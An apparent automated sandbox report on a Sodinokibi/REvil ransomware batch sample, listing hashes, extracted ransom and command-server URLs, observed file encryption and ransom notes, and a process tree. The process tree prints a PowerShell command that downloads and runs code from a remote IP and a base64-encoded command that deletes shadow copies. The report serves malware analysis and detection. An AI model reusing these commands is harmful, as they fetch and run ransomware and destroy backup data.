Analysis
-
max time kernel
145s -
max time network
73s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
18-08-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
Resource
win10v200722
General
-
Target
6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat
-
Size
215B
-
MD5
4ff9830e5ccfee8915f14f83fe8f1918
-
SHA1
0efe2413519a6ce400cc4042ee029c2b84b73b25
-
SHA256
6e19ccbb3e491327f4ddebd05fd7ce6c87d9a94acd5851b856569ecb1a17a347
-
SHA512
222eeadcd7acf048a6e5cd50d5df143c63f1200f9bc571333aff360ba7e88453152e071383d1f6d68fc889556beb01b931f08305d5daaa4ed1e697be60920108
Malware Config
Extracted
http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf
Extracted
C:\21bh2n-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/176BEE8C9B811708
http://decryptor.cc/176BEE8C9B811708
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1012 powershell.exe -
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\CompressNew.raw => \??\c:\users\admin\pictures\CompressNew.raw.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\CompleteRedo.png => \??\c:\users\admin\pictures\CompleteRedo.png.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\DenyApprove.png => \??\c:\users\admin\pictures\DenyApprove.png.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\InstallUnblock.crw => \??\c:\users\admin\pictures\InstallUnblock.crw.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\SetResize.raw => \??\c:\users\admin\pictures\SetResize.raw.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => \??\c:\users\admin\pictures\UninstallConnect.tif.21bh2n powershell.exe File renamed C:\Users\Admin\Pictures\UseRedo.tif => \??\c:\users\admin\pictures\UseRedo.tif.21bh2n powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d3bk4y2he.bmp" powershell.exe -
Drops file in Program Files directory 35 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertToInitialize.mpe powershell.exe File opened for modification \??\c:\program files\InvokeNew.midi powershell.exe File opened for modification \??\c:\program files\OutClose.mov powershell.exe File created \??\c:\program files\microsoft sql server compact edition\21bh2n-readme.txt powershell.exe File opened for modification \??\c:\program files\SwitchImport.ppsm powershell.exe File opened for modification \??\c:\program files\FindReset.wmx powershell.exe File opened for modification \??\c:\program files\GrantComplete.xlsx powershell.exe File opened for modification \??\c:\program files\ImportInstall.vsdm powershell.exe File opened for modification \??\c:\program files\RedoComplete.ex_ powershell.exe File opened for modification \??\c:\program files\ConvertToJoin.wvx powershell.exe File opened for modification \??\c:\program files\ConvertToUpdate.vdw powershell.exe File opened for modification \??\c:\program files\InitializeProtect.eps powershell.exe File opened for modification \??\c:\program files\ResolveConvertFrom.xlsx powershell.exe File opened for modification \??\c:\program files\OpenHide.vdx powershell.exe File opened for modification \??\c:\program files\RevokeStep.docx powershell.exe File opened for modification \??\c:\program files\TraceCheckpoint.mp2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\21bh2n-readme.txt powershell.exe File created \??\c:\program files\21bh2n-readme.txt powershell.exe File created \??\c:\program files (x86)\21bh2n-readme.txt powershell.exe File opened for modification \??\c:\program files\GroupCheckpoint.vdx powershell.exe File opened for modification \??\c:\program files\RepairPop.docx powershell.exe File opened for modification \??\c:\program files\RevokeResize.dotx powershell.exe File opened for modification \??\c:\program files\StopUnpublish.docx powershell.exe File opened for modification \??\c:\program files\UnregisterInitialize.dotm powershell.exe File opened for modification \??\c:\program files\InstallPop.ttf powershell.exe File opened for modification \??\c:\program files\MoveSelect.edrwx powershell.exe File opened for modification \??\c:\program files\PopRegister.clr powershell.exe File opened for modification \??\c:\program files\ReadConvertFrom.zip powershell.exe File opened for modification \??\c:\program files\SplitHide.gif powershell.exe File opened for modification \??\c:\program files\ConfirmRead.xht powershell.exe File opened for modification \??\c:\program files\ConvertCompare.mp2 powershell.exe File opened for modification \??\c:\program files\MergeFind.wma powershell.exe File opened for modification \??\c:\program files\UndoTest.au3 powershell.exe File opened for modification \??\c:\program files\UninstallResolve.mpeg3 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\21bh2n-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1012 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1012 powershell.exe 1012 powershell.exe 1012 powershell.exe 620 powershell.exe 620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 1012 powershell.exe Token: SeDebugPrivilege 620 powershell.exe Token: SeBackupPrivilege 2040 vssvc.exe Token: SeRestorePrivilege 2040 vssvc.exe Token: SeAuditPrivilege 2040 vssvc.exe Token: SeTakeOwnershipPrivilege 1012 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 844 wrote to memory of 1012 844 cmd.exe powershell.exe PID 844 wrote to memory of 1012 844 cmd.exe powershell.exe PID 844 wrote to memory of 1012 844 cmd.exe powershell.exe PID 844 wrote to memory of 1012 844 cmd.exe powershell.exe PID 1012 wrote to memory of 620 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 620 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 620 1012 powershell.exe powershell.exe PID 1012 wrote to memory of 620 1012 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\6bfe2bf5d32adbdaa5ef03bf7c3652cf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6bfe2bf5d32adbdaa5ef03bf7c3652cf');Invoke-CXLQETAA;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2040